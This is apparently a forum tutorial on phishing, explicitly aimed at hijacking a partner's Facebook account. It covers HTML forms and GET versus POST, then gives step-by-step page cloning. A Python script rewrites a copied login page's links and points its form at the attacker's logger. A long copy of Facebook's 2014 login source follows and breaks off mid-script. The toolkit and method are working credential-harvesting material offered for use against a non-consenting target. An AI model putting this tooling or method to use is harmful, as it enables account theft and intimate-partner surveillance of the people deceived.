The Art of Phishing

Social engineering is the art of manipulating people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery for information gathering or computer system access and in most cases the attacker never comes face-to-face with the victim.

Post by -Ninjex- on Mon Oct 27, 2014 9:24 am

Disclaimer: You are responsible for all your actions. I do not condone any illegal activities, nor does HackThisSite. This information is purely for educational purposes.
All individuals whose credentials were gathered by the phishing page released in this article are considered to have given prior consent and to have been made aware of the consequences, and of the information contained in this article, before entering confidential information on my site.

Getting access to your girlfriend's Facebook:
So, she is your girlfriend and most likely not tech-savvy.
You claim she might be cheating on you, or hiding something, but really you are just a paranoid psycho.
The easiest way to take over her account is through social engineering. If you can't convince your girlfriend to do something, you are terrible at life.
I would talk about plugins like Firesheep (a browser extension that hijacked logged-in sessions by sniffing cookies on open Wi-Fi), but with the move of major sites to SSL it is no longer a very viable option.
So instead, I will demonstrate how phishing attacks are crafted, and the methodology behind them.
In layman's terms, a phishing attack is simply a web page that looks as similar as possible to the login page of the site whose credentials you want.
This maliciously crafted page hosts a script that grabs the credentials the user submits and logs them.

Phishing
A. Web Design Structure
1. HTML & CSS
2. PHP & SQL

B. Forms
1. What is a form
2. GET & POST
3. Common uses of forms

C. Phishing
1. Looking at the source
2. Cloning a page
3. Modify the clone
4. Logging credentials
5. Redirecting

D. Social Engineering & Tactics
1. Homepage / Bookmarks
2. Sending a link
3. URL Redirects
4. Wait bait
5. Spoofing E-mail
6. Spoofing Numbers
7. Portability

A. [Web Design Structure]
1. [HTML & CSS]
- HTML is the part of a web page that provides its structure and content.
- CSS is the part of a page that tells elements where to go and what to look like; CSS is essentially there to make the page look 'pretty'.

2. [PHP & SQL]
- PHP is a server-side language that handles things like sessions, cookies, and user input. If you have ever noticed a '.php' extension on a page you are visiting, that is a file containing PHP code. PHP is usually used to do something with user input, or to create dynamic content for the user. PHP is one of the most widely used server-side web languages, and it is commonly used to communicate with a database.
- SQL, or Structured Query Language, is the language used to communicate with a database. Databases usually contain confidential and relevant information such as usernames, passwords (which a well-built site stores only as hashes), IP history, credit card information, etc.

If a car were a web page, the frame would be the HTML (basic structure), the paint and interior would be the CSS (making it look prettier), the gas pedal would be the PHP (it does something with user input and, in a way, communicates with the gas tank), and the dashboard would be the database (it holds the relevant information).

B. [Forms]
1. [What is a form]
- A form is a piece of HTML that is used to collect information from a user. A form sends the information it gathers to be processed by some other script (usually a PHP script).
- The example form below takes a username and password and sends them off to be processed by a file called process.php:
Code:
<form name="input" action="process.php" method="post">
Username: <input type="text" name="user">
Password: <input type="password" name="pass">
<input type="submit" value="Login">
</form>


2. [GET & POST]
- It is worth mentioning the difference between GET and POST forms. A POST form like the one above (notice the method="post" attribute) sends the field values in the body of the HTTP request, so they do not appear in the URL. A GET form appends the values to the URL as query-string parameters. Submitting the example above with username bob and password bob101 through a GET form would produce a request to http://www.site.com/process.php?user=bob&pass=bob101, and that URL ends up in the browser history, in bookmarks, in the Referer header sent to any site linked from the page, and in the web server's access log. When handling confidential information, be wary of the difference and do not use a GET form. Note that POST is not encryption: without HTTPS the request body is just as readable on the wire as the URL.
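As an added example (not code from the original post), the script below shows what the same username/password form submits when its method is GET versus POST, and then scans a few web-server access-log lines for credentials that leaked into the query string because a form used GET. The log lines are constructed for this example, and the set of parameter names treated as sensitive is an assumption.

```python
"""Added example (not from the original post): GET vs POST for the same
login form, plus a scan of web-server access-log lines for credentials that
leaked into the query string.  The log lines are constructed for this
example; the set of sensitive parameter names is an assumption."""
from urllib.parse import urlencode, urlsplit, parse_qs

# Names that should never appear in a query string (assumption; extend as needed).
SENSITIVE_PARAMS = {"pass", "password", "passwd", "pwd", "pin", "token"}


def encode_form(method: str, action: str, fields: dict) -> tuple:
    """Return (request_target, body) as a browser would send the form.
    GET puts the fields in the URL; POST puts them in the request body."""
    data = urlencode(fields)
    if method.upper() == "GET":
        return f"{action}?{data}", ""
    return action, data


def leaked_credentials(log_lines) -> list:
    """Find sensitive parameter names in the query strings of combined-format
    access-log lines.  Returns a list of (method, path, [leaked names])."""
    hits = []
    for line in log_lines:
        try:
            request = line.split('"')[1]             # e.g. 'GET /x?y=1 HTTP/1.1'
            method, target, _version = request.split(" ", 2)
        except (IndexError, ValueError):
            continue                                  # malformed line, skip it
        parts = urlsplit(target)
        leaked = sorted(k for k in parse_qs(parts.query) if k.lower() in SENSITIVE_PARAMS)
        if leaked:
            hits.append((method, parts.path, leaked))
    return hits


# Constructed access-log lines in Apache/nginx combined format.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Oct/2014:09:24:01 +0000] "GET /process.php?user=bob&pass=bob101 HTTP/1.1" 302 0 "http://www.site.com/login.php" "Mozilla/5.0"',
    '10.0.0.5 - - [27/Oct/2014:09:24:05 +0000] "POST /process.php HTTP/1.1" 302 0 "http://www.site.com/login.php" "Mozilla/5.0"',
    '10.0.0.9 - - [27/Oct/2014:09:25:11 +0000] "GET /search.php?q=hello+world HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'garbage line without a request',
]

if __name__ == "__main__":
    fields = {"user": "bob", "pass": "bob101"}
    for method in ("GET", "POST"):
        target, body = encode_form(method, "http://www.site.com/process.php", fields)
        print(f"{method}: url={target} body={body!r}")
    print("leaked:", leaked_credentials(SAMPLE_LOG))
```

The POST request to the same script leaves nothing sensitive in the log line, which is exactly why the scan only flags the GET submission; the same scan run over a real access log is a quick way to find forms on your own site that send secrets the wrong way.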

3. [Common uses of forms]
- One of the most common types of form you will encounter is a login form, which usually asks for a username (or email) and a password.
- Forms are used to process transactions (like buying things on eBay or Amazon).
- Registration forms collect user information during sign-up.
- Forms even handle things like changing account security details.

C. [Phishing]
Now that we have some general knowledge of what a form is and how web pages are constructed, we can get on to the more fun stuff, like performing a phishing attack.
My goal here isn't just to show you how to get credentials. My goal is to help you learn something new, hence the information covered up to this point.

1. [Looking at the source]
- You can view any page's source code at any time by pressing Ctrl+U. Reading a page's source can clue you in on many things (like potential vulnerabilities), but that's a story for another day.

2. [Cloning a page]
- Okay, the title is somewhat misleading: we will not literally be cloning the page. We will be creating a page that 'looks' just like another page. We cannot actually clone the page because we will not usually have access to the server-side code. However, we can grab all of the client-side code (the HTML, CSS and JavaScript), which is all we need to make the page look identical to the target.

The process is simple. Navigate to the login page of the target website (in the case of Facebook, the login form is on the home page) and press Ctrl+U to view the page source. Now copy all of the code: Ctrl+A to select all, then Ctrl+C to copy.

Now that you have the code, we need to discuss hosting. You can host files locally on your own computer, or you can get a domain for a small fee. Whichever you choose, make sure the server is able to execute PHP code. For a server I also recommend having some database access. (Setting up a server, locally or otherwise, is not covered in this tutorial.)

Save the copied code to a file with a name such as login.php, so that the URL appears less suspicious.

One thing to check before going further: relative URLs in the copied source (for example href="/r.php" or action="/login.php?login_attempt=1") resolve against your server once the file is hosted elsewhere, so any links, images or stylesheets that use them will break. Rewrite them to absolute URLs on the target site. In the Facebook source below the stylesheets and scripts are already absolute CDN URLs, so only the relative links need attention.
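The following script is an added example, not code from the original post. It performs the mechanical parts of this step and of the modification that follows it: it rewrites relative and scheme-relative href/src URLs in a saved copy of a login page to absolute URLs on the target site (so stylesheets, scripts and links keep working from your server) and points the login form's action at your own logger script. It also lists the form's field names, which are what the logger must read; note that the Facebook form in the source below uses email and pass, not the user and pass of the small example form earlier. The sample HTML, the stand-in origin https://www.example.com/login and the file name process.php are constructed assumptions.

```python
"""Added example (not from the original post): prepare a saved login page
for hosting elsewhere.  The sample HTML, the stand-in origin and the logger
file name process.php are all constructed assumptions for this example."""
import re
from urllib.parse import urljoin

# Constructed stand-in for a saved login page; real pages are far larger,
# but the mix of relative, scheme-relative and absolute URLs is typical.
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="/rsrc.php/v2/yM/r/GjpdRKdIhhI.css" />
<script src="//static.example-cdn.net/app.js"></script>
</head><body>
<a href="/r.php?locale=en_US">Sign Up</a>
<form id="login_form" action="/login.php?login_attempt=1" method="post">
<input type="hidden" name="lsd" value="AVpgFClF" />
<input type="text" name="email" />
<input type="password" name="pass" />
<input type="submit" value="Log In" />
</form>
<a href="https://www.example.com/recover/initiate">Forgot your password?</a>
</body></html>"""

# href/src values; the lookbehind keeps attributes such as data-src untouched.
URL_ATTR_RE = re.compile(r'(?<![\w-])(href|src)=(["\'])(.*?)\2', re.IGNORECASE)
# The action attribute of any <form ...> tag.
FORM_ACTION_RE = re.compile(r'(<form\b[^>]*?\baction=)(["\'])(.*?)\2', re.IGNORECASE)
# name="..." attributes of <input> tags.
INPUT_NAME_RE = re.compile(r'<input\b[^>]*?\bname=(["\'])(.*?)\1', re.IGNORECASE)


def absolutize_links(html: str, origin: str) -> str:
    """Rewrite relative and scheme-relative href/src values against origin.
    URLs that are already absolute are returned unchanged by urljoin."""
    def fix(m):
        attr, quote, url = m.group(1), m.group(2), m.group(3)
        return f"{attr}={quote}{urljoin(origin, url)}{quote}"
    return URL_ATTR_RE.sub(fix, html)


def retarget_forms(html: str, logger_path: str) -> str:
    """Point every form's action at our logger so submissions reach us."""
    return FORM_ACTION_RE.sub(
        lambda m: f"{m.group(1)}{m.group(2)}{logger_path}{m.group(2)}", html)


def form_field_names(html: str) -> list:
    """Names of the inputs inside the first <form>; the logger must read these."""
    form = re.search(r"<form\b.*?</form>", html, re.IGNORECASE | re.DOTALL)
    if not form:
        return []
    return [name for _quote, name in INPUT_NAME_RE.findall(form.group(0))]


def build_clone(html: str, origin: str, logger_path: str = "process.php") -> str:
    """Absolutize first, then retarget, so the logger path stays relative to us."""
    return retarget_forms(absolutize_links(html, origin), logger_path)


if __name__ == "__main__":
    clone = build_clone(SAMPLE_PAGE, "https://www.example.com/login")
    print(clone)
    print("fields the logger must read:", form_field_names(clone))
```

The order matters: if the form action were rewritten before the links were absolutized, process.php would itself be turned into a URL on the target site and the credentials would go to the real login endpoint instead of your logger. Hidden inputs such as lsd can stay in place; the logger simply ignores them. The regexes are adequate for a demonstration but not for arbitrary HTML, and wget -p -k (page requisites plus link conversion) will do the link rewriting for you, leaving only the form action to change by hand.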

3. [Modifying the clone]
- Now that you have the cloned page, there is one major change you are going to want to make. In the case of Facebook, the source should look like this:
Code:
<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>function envFlush(a){function b(c){for(var d in a)c[d]=a[d];}if(window.requireLazy){window.requireLazy(['Env'],b);}else{Env=window.Env||{};b(Env);}}envFlush({"ajaxpipe_token":"AXixXRT758ym20j2","lhsh":"RAQGe_wAv","khsh":"0`sj`e`rm`s-0fdu^gshdoer-0gc^eurf-3gc^eurf;1;enbtldou;fduDmdldourCxO`ld-2YLMIuuqSdptdru;qsnunuxqd;rdoe"});</script><script>CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?login_attempt=1&amp;_fb_noscript=1" /></noscript><meta name="referrer" content="default" id="meta_referrer" /><title id="pageTitle">Facebook</title><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?login_attempt=1" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login" /><link rel="alternate" media="only screen and (max-width: 640px)" href="https://www.facebook.com/login" /><link rel="alternate" media="handheld" href="https://www.facebook.com/login" /><link rel="alternate" hreflang="x-default" href="https://www.facebook.com/login" /><link rel="alternate" hreflang="en" href="https://www.facebook.com/login" /><link rel="alternate" hreflang="ar" href="https://ar-ar.facebook.com/login" /><link rel="alternate" hreflang="bg" href="https://bg-bg.facebook.com/login" /><link rel="alternate" hreflang="bs" href="https://bs-ba.facebook.com/login" /><link rel="alternate" hreflang="ca" href="https://ca-es.facebook.com/login" /><link rel="alternate" hreflang="da" href="https://da-dk.facebook.com/login" /><link rel="alternate" hreflang="el" href="https://el-gr.facebook.com/login" /><link rel="alternate" hreflang="es" href="https://es-la.facebook.com/login" /><link rel="alternate" hreflang="es-es" href="https://es-es.facebook.com/login" /><link rel="alternate" hreflang="fa" href="https://fa-ir.facebook.com/login" /><link rel="alternate" hreflang="fi" href="https://fi-fi.facebook.com/login" /><link 
rel="alternate" hreflang="fr" href="https://fr-fr.facebook.com/login" /><link rel="alternate" hreflang="fr-ca" href="https://fr-ca.facebook.com/login" /><link rel="alternate" hreflang="hi" href="https://hi-in.facebook.com/login" /><link rel="alternate" hreflang="hr" href="https://hr-hr.facebook.com/login" /><link rel="alternate" hreflang="id" href="https://id-id.facebook.com/login" /><link rel="alternate" hreflang="it" href="https://it-it.facebook.com/login" /><link rel="alternate" hreflang="ko" href="https://ko-kr.facebook.com/login" /><link rel="alternate" hreflang="mk" href="https://mk-mk.facebook.com/login" /><link rel="alternate" hreflang="ms" href="https://ms-my.facebook.com/login" /><link rel="alternate" hreflang="pl" href="https://pl-pl.facebook.com/login" /><link rel="alternate" hreflang="pt" href="https://pt-br.facebook.com/login" /><link rel="alternate" hreflang="pt-pt" href="https://pt-pt.facebook.com/login" /><link rel="alternate" hreflang="ro" href="https://ro-ro.facebook.com/login" /><link rel="alternate" hreflang="sl" href="https://sl-si.facebook.com/login" /><link rel="alternate" hreflang="sr" href="https://sr-rs.facebook.com/login" /><link rel="alternate" hreflang="th" href="https://th-th.facebook.com/login" /><link rel="alternate" hreflang="vi" href="https://vi-vn.facebook.com/login" /><meta name="description" content="Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with..." /><meta name="robots" content="noodp,noydir" /><noscript><meta http-equiv="X-Frame-Options" content="DENY" /></noscript><link rel="shortcut icon" href="https://fbstatic-a.akamaihd.net/rsrc.php/yl/r/H3nktOa7ZMg.ico" />
    <link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yM/r/GjpdRKdIhhI.css" />
    <link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/ym/r/LTPkjGCoITI.css" />
    <link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yg/r/Cwm8k3kJTRY.css" />
    <link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yg/r/yk5mtKZjv4H.css" />

    <script src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yY/r/aY29MwcYK3B.js" crossorigin="anonymous"></script>
<script>(require("ServerJSDefine")).handleDefines([["URLFragmentPreludeConfig",[],{"incorporateQuicklingFragment":true,"hashtagRedirect":true},137],["BootloaderConfig",[],{},329],["CurrentUserInitialData",[],{"USER_ID":"0","ACCOUNT_ID":"0"},270],["SiteData",[],{"revision":1468811,"tier":"","push_phase":"V3","pkg_cohort":"EXP1:DEFAULT","vip":"31.13.65.33"},317],["UserAgentData",[],{"browserFullVersion":"33.0","browserMinorVersion":0,"browserName":"Firefox","browserVersion":33,"deviceName":"Unknown","engineName":"Gecko","engineVersion":"33.0","platformName":"Windows","platformVersion":"8","platformFullVersion":"8.1"},527],["CurrentCommunityInitialData",[],{},490],["DTSGInitialData",[],{},258],["ISB",[],{},330],["LSD",[],{"token":"AVpgFClF"},323],["BanzaiConfig",[],{"EXPIRY":86400000,"MAX_SIZE":10000,"MAX_WAIT":150000,"RESTORE_WAIT":150000,"blacklist":["time_spent"],"gks":{"adapterhooks":true,"boosted_pagelikes":true,"boosted_website":true,"boosted_posts":true,"jslogger":true,"miny_compression":true,"pages_client_logging":true,"time_spent_bit_array":true,"time_spent_debug":true,"useraction":true,"videos":true,"visibility_tracking":true,"vitals":true}},7],["AsyncRequestConfig",[],{"retryOnNetworkError":"1"},328],["FbtLogger",[],{"logger":null},288],["FbtQTOverrides",[],{"overrides":{"8b0c31a270a324f26d2417a358106611":"Replacement QT 
String!"}},551],["EagleEyeConfig",[],{"seed":"08kH"},294],["TrackingConfig",[],{"domain":"https:\/\/pixel.facebook.com"},325],["ErrorSignalConfig",[],{"uri":"https:\/\/error.facebook.com\/common\/scribe_endpoint.php"},319],["InitialServerTime",[],{"serverTime":1414406746000},204],["UFIConstants",[],{"UFIActionType":{"COMMENT_LIKE":"fa-type:comment-like","COMMENT_SET_SPAM":"fa-type:mark-spam","DELETE_COMMENT":"fa-type:delete-comment","DISABLE_COMMENTS":"fa-type:disable-comments","LIVE_DELETE_COMMENT":"fa-type:live-delete-comment","LIKE_ACTION":"fa-type:like","SUBSCRIBE_ACTION":"fa-type:subscribe","REMOVE_PREVIEW":"fa-type:remove-preview","MARK_COMMENT_SPAM":"fa-type:mark-spam","CONFIRM_COMMENT_REMOVAL":"fa-type:confirm-remove","TRANSLATE_COMMENT":"fa-type:translate-comment","COMMENT_LIKECOUNT_UPDATE":"fa-type:comment-likecount-update","ADD_COMMENT_ACTION":"fa-type:add-comment"},"UFICommentOrderingMode":{"CHRONOLOGICAL":"chronological","RANKED_THREADED":"ranked_threaded","TOPLEVEL":"toplevel","RECENT_ACTIVITY":"recent_activity","FEATURED":"featured","UNSUPPORTED":"unsupported"},"UFIFeedbackSourceType":{"PROFILE":0,"NEWS_FEED":1,"OBJECT":2,"MOBILE":3,"EMAIL":4,"PROFILE_APPROVAL":10,"TICKER":12,"NONE":13,"INTERN":14,"ADS":15,"EVENT_GOING_FLYOUT":16,"PHOTOS_SNOWLIFT":17,"NOTIFICATION_FLYOUT":18,"LOCAL_FEED":19,"PHOTOS_SNOWFLAKE":20},"UFIPayloadSourceType":{"UNKNOWN":0,"INITIAL_SERVER":1,"LIVE_SEND":2,"USER_ACTION":3,"ENDPOINT_LIKE":10,"ENDPOINT_COMMENT_LIKE":11,"ENDPOINT_ADD_COMMENT":12,"ENDPOINT_EDIT_COMMENT":13,"ENDPOINT_DELETE_COMMENT":14,"ENDPOINT_COMMENT_SPAM":16,"ENDPOINT_REMOVE_PREVIEW":17,"ENDPOINT_ID_COMMENT_FETCH":18,"ENDPOINT_COMMENT_FETCH":19,"ENDPOINT_TRANSLATE_COMMENT":20,"ENDPOINT_BAN":21,"ENDPOINT_SUBSCRIBE":22,"ENDPOINT_COMMENT_LIKECOUNT_UPDATE":23,"ENDPOINT_DISABLE_COMMENTS":24,"ENDPOINT_ACTOR_CHANGE":25},"UFIStatus":{"DELETED":"status:deleted","SPAM":"status:spam","SPAM_DISPLAY":"status:spam-display","LIVE_DELETED":"status:live-deleted","FAILED_ADD":"s
tatus:failed-add","FAILED_EDIT":"status:failed-edit","PENDING_EDIT":"status:pending-edit"},"attachmentTruncationLength":80,"commentTruncationLength":420,"commentTruncationMaxLines":3,"commentTruncationPercent":0.6,"commentURLTruncationLength":60,"defaultPageSize":50,"infiniteScrollRangeForQANDAPermalinks":1000,"minCommentsForOrderingModeSelector":2,"unavailableCommentKey":"unavailable_comment_key"},240]]);new (require("ServerJS"))().handle({"require":[["markJSEnabled"],["lowerDomain"],["URLFragmentPrelude"],["Primer"],["Bootloader"]]});</script></head><body class="login_page fbx UIPage_LoggedOut _2gsg gecko win Locale_en_US" dir="ltr"><div class="_li"><div id="pagelet_bluebar"><div id="blueBarDOMInspector" class="_21mm"><div id="blueBarNAXAnchor" class="_4f7n _xxp"><div><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat _ohe" href="/" title="Go to Facebook Home"><i class="fb_logo img sp_MXzTRXPhpG1 sx_517fe9"><u>Facebook logo</u></i></a></div></div><div class="signupBanner"><div class="signup_bar_container"><div class="signup_box clearfix"><span class="signup_box_content"><a class="_42ft _42fu signup_btn selected _42gz _42gy" role="button" href="/r.php?locale=en_US">Sign Up</a></span></div></div></div></div></div></div></div><div id="globalContainer" class="uiContextualLayerParent"><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial login_page_interstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat _ohf"><h2 class="accessible_elem">Facebook Login</h2><div class="uiHeaderActions"></div></div><div><h2 class="uiHeaderTitle" aria-hidden="true">Facebook Login</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="login_form_container"><form id="login_form" action="/login.php?login_attempt=1" method="post" 
onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" name="lsd" value="AVpgFClF" autocomplete="off" /><div class="hidden_elem"></div><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="enable_profile_selector" name="enable_profile_selector" value="" /><input type="hidden" autocomplete="off" id="legacy_return" name="legacy_return" value="1" /><input type="hidden" autocomplete="off" id="profile_selector_ids" name="profile_selector_ids" value="" /><input type="hidden" autocomplete="off" id="trynum" name="trynum" value="1" /><input type="hidden" autocomplete="off" name="timezone" value="" id="u_0_0" /><input type="hidden" name="lgnrnd" value="034546_8rF1" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><div class="form_row clearfix"><label for="email" class="login_form_label">Email or Phone:</label><input type="text" class="inputtext" id="email" name="email" value="" tabindex="1" /></div><div class="form_row clearfix"><label for="pass" class="login_form_label">Password:</label><input type="password" name="pass" id="pass" class="inputpassword" tabindex="1" /></div><div class="persistent"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input id="persist_box" type="checkbox" value="1" name="persistent" class="uiInputLabelInput uiInputLabelCheckbox" /><label for="persist_box" class="uiInputLabelLabel">Keep me logged in</label></div></div><input type="hidden" autocomplete="off" id="default_persistent" name="default_persistent" value="0" /><div id="buttons" class="form_row clearfix"><label class="login_form_label"></label><div id="login_button_inline"><label class="uiButton uiButtonConfirm uiButtonLarge" id="loginbutton" for="u_0_1"><input value="Log In" name="login" tabindex="1" type="submit" id="u_0_1" /></label></div><div id="register_link">or <strong><a 
href="/r.php?next&amp;locale=en_US&amp;display=page" rel="nofollow">Sign up for Facebook</a></strong></div></div><p class="reset_password form_row"><a href="https://www.facebook.com/recover/initiate" target="">Forgot your password?</a></p></div></form></div></div></div><ul class="uiList ptm localeSelectorList _509- _4ki _6-h _6-j _6-i"><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;en_US&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="English (US)">English (US)</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;es_LA&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Spanish">Español</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;pt_BR&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Portuguese (Brazil)">Português (Brasil)</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;fr_FR&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="French (France)">Français (France)</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;de_DE&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="German">Deutsch</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;it_IT&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Italian">Italiano</a></li><li><a dir="rtl" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;ar_AR&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Arabic">العربية</a></li><li><a dir="ltr" 
href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;hi_IN&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Hindi">हिन्दी</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;zh_CN&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Simplified Chinese (China)">中文(简体)</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;ja_JP&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Japanese">日本語</a></li><li><a class="showMore" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1&amp;source=TOP_LOCALES_DIALOG" title="Show more languages" href="#" role="button">…</a></li></ul></div></div><div id="pageFooter" data-referrer="page_footer"><div id="contentCurve"></div><div role="contentinfo" aria-label="Facebook site links"><table class="uiGrid _51mz navigationGrid" cellspacing="0" cellpadding="0"><tbody><tr class="_51mx"><td class="_51m- hLeft plm"><a href="/mobile/?ref=pf" title="Check out Facebook Mobile.">Mobile</a></td><td class="_51m- hLeft plm"><a href="/find-friends?ref=pf" title="Find anyone on the web.">Find Friends</a></td><td class="_51m- hLeft plm"><a href="/badges/?ref=pf" title="Embed a Facebook badge on your website.">Badges</a></td><td class="_51m- hLeft plm"><a href="/directory/people/" title="Browse our people directory.">People</a></td><td class="_51m- hLeft plm"><a href="/directory/pages/" title="Browse our pages directory.">Pages</a></td><td class="_51m- hLeft plm"><a href="/places/" title="Check out popular places on Facebook.">Places</a></td><td class="_51m- hLeft plm"><a href="/games/" title="Check out Facebook games.">Games</a></td><td class="_51m- hLeft plm"><a href="/directory/places/" title="Browse our places 
directory.">Locations</a></td><td class="_51m- hLeft plm _51mw"><a href="/facebook" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></td></tr><tr class="_51mx"><td class="_51m- hLeft plm"><a href="/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></td><td class="_51m- hLeft plm"><a href="/pages/create/?ref_type=sitefooter" title="Create a Page">Create Page</a></td><td class="_51m- hLeft plm"><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></td><td class="_51m- hLeft plm"><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a></td><td class="_51m- hLeft plm"><a href="/privacy/explanation" title="Learn about your privacy and Facebook.">Privacy</a></td><td class="_51m- hLeft plm"><a href="/help/cookies/?ref=sitefooter" title="Learn about cookies and Facebook.">Cookies</a></td><td class="_51m- hLeft plm"><a href="/policies/?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></td><td class="_51m- hLeft plm"><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></td></tr></tbody></table></div><div class="mvl copyright"><div><span> Facebook © 2014</span><div class="fsm fwn fcg"><a rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1&amp;source=TOP_LOCALES_DIALOG" title="Use Facebook in another language." 
href="#" role="button">English (US)</a></div></div></div></div></div></div><script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=1598"+"&m="+m;},5000);}if(top!=self && !false){try{if(parent!=top){throw 1;}var si_cj_d=["apps.facebook.com","apps.beta.facebook.com"];var href=top.location.href.toLowerCase();for(var i=0;i<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3 http:\/\/infosploit.com\/test\/phish.php");}catch(e){si_cj("1 \thttp:\/\/infosploit.com\/test\/phish.php");window.document.write("\u003Cstyle>body * {display:none !important;}\u003C\/style>\u003Ca href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display:block !important;padding:10px\">\u003Ci class=\"img sp_MXzTRXPhpG1 sx_54c74a\" style=\"display:block !important\">\u003C\/i>Go to Facebook.com\u003C\/a>");/*iK0WvLKy*/}}/*]]>*/</script>
<script>requireLazy(["Bootloader"], function(Bootloader) {Bootloader.setResourceMap({"JtyCr":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y8\/r\/F4N5m0sVKrc.js"},"Nm4nS":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yY\/r\/GulZga8NH6I.js"},"fmS14":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yq\/r\/G24lvrTH9Ug.js"},"AhP9C":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yS\/r\/PT85t-Oh-gK.js"},"FlMQw":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yX\/r\/1bJWa1kOOcH.js"},"4vv8\/":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yf\/r\/JvK_C44obT2.js"},"r+ckK":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yM\/r\/GjpdRKdIhhI.css"},"bKKW+":{"type":"css","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/ym\/r\/LTPkjGCoITI.css"},"F5aqA":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yg\/r\/Cwm8k3kJTRY.css"},"nHPXb":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yg\/r\/yk5mtKZjv4H.css"},"YICz5":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\